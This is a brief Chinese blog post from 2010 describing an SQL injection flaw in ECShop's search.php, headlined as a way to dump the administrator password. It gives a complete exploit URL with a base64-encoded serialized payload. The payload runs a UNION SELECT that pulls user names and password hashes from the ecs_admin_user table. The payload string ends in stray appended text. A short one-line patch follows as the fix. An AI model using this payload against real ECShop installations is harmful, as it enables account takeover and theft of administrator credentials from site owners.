ecshop search.php的注入漏洞-爆出管理员密码！

作者:admin 日期:2010-07-06

字体大小: 小中大

ecshop search.php的注入漏洞-爆出管理员密码！

利用语句：
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code

解决方案
search.php
大概300 源
if (is_not_null($val) )
修改为
if (is_not_null($val) && is_numeric($key))

文章来自: 本站原创

Tags:

评论: 0 | 查看次数: 9383

ecshop search.php的注入漏洞-爆出管理员密码！

作者:admin 日期:2010-07-06

ecshop search.php的注入漏洞-爆出管理员密码！

Calendar

Search

Category

Links